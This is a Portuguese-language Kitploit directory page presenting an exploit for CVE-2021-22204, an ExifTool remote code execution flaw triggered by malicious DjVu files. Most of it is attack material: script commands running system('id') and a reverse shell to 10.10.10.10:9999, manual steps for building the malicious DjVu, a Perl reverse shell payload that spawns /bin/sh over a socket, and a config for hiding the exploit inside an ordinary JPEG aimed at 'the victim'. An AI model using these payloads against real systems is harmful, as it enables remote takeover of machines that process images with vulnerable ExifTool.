Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-22204 — Script de exploit para CVE-2021-22204, um RCE do ExifTool via arquivos DjVu maliciosos, com etapas manuais de exploração e payloads de reverse shell. | Kitploit
Ferramentas/GitHubGitHub/assassinukg/cve-2021-22204
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubassassinukg/cve-2021-22204

CVE-2021-22204

Script de exploit para CVE-2021-22204, um RCE do ExifTool via arquivos DjVu maliciosos, com etapas manuais de exploração e payloads de reverse shell.

Ver Repositório
2792há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-22204

Descrição

A neutralização inadequada dos dados do usuário no formato de arquivo DjVu no ExifTool versões 7.44 e superiores permite a execução arbitrária de código ao analisar a imagem maliciosa

Script

Link do Script

image

Uso do script:

Comando do sistema:

root@kitploit:~
bash CVE-2021-2204.sh "system('id')" happy.jpg 

Reverse shell

root@kitploit:~
bash CVE-2021-2204.sh "reverseme 10.10.10.10 9999" happy.jpg

*Seu IP e PORTA

Exploração Manual

root@kitploit:~
$ sudo apt install djvulibre-bin
# Installs the required tools
 
$ bzz payload payload.bzz
# Compress our payload file with to make it non human-readable
 
$ djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
# INFO = Anything in the format 'N,N' where N is a number
# BGjp = Expects a JPEG image, but we can use /dev/null to use nothing as background image
# ANTz = Will write the compressed annotation chunk with the input file

Payload

root@kitploit:~
(metadata "\c${system('id')};")

Payload (para reversehell)

root@kitploit:~
(metadata "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(9999,inet_aton('localhost'))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};#")

Então, quando a vítima abrir o arquivo exploit.djvu com uma versão vulnerável do ExifTool, nosso código Perl embutido executará o comando id .

Arquivo de configuração para o ExifTool

root@kitploit:~
%Image::ExifTool::UserDefined = (
    # All EXIF tags are added to the Main table, and WriteGroup is used to
    # specify where the tag is written (default is ExifIFD if not specified):
    'Image::ExifTool::Exif::Main' => {
        # Example 1.  EXIF:NewEXIFTag
        0xc51b => {
            Name => 'HasselbladExif',
            Writable => 'string',
            WriteGroup => 'IFD0',
        },
        # add more user-defined EXIF tags here...
    },
);
1; #end%

O que este arquivo faz é possibilitar que escrevamos uma nova tag no arquivo, com o nome HasselbladExif e os bytes 0xc51b para identificá-la dentro do nosso novo arquivo. Então podemos inseri-la dentro de qualquer arquivo. [8]Em seguida, use-a e nosso exploit.djvu já criado para inserir o arquivo DjVu malicioso dentro de um JPEG válido.

root@kitploit:~
$ exiftool -config configfile '-HasselbladExif<=exploit.djvu' hacker.jpg

configfile = The name of our configuration file;
-HasselbladExif = Tag name that are specified in the config file;
exploit.djvu = Our exploit, previously made with djvumake;
hacker.jpg = A valid JPEG file;

Créditos e ajuda: https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/

Baixar ferramenta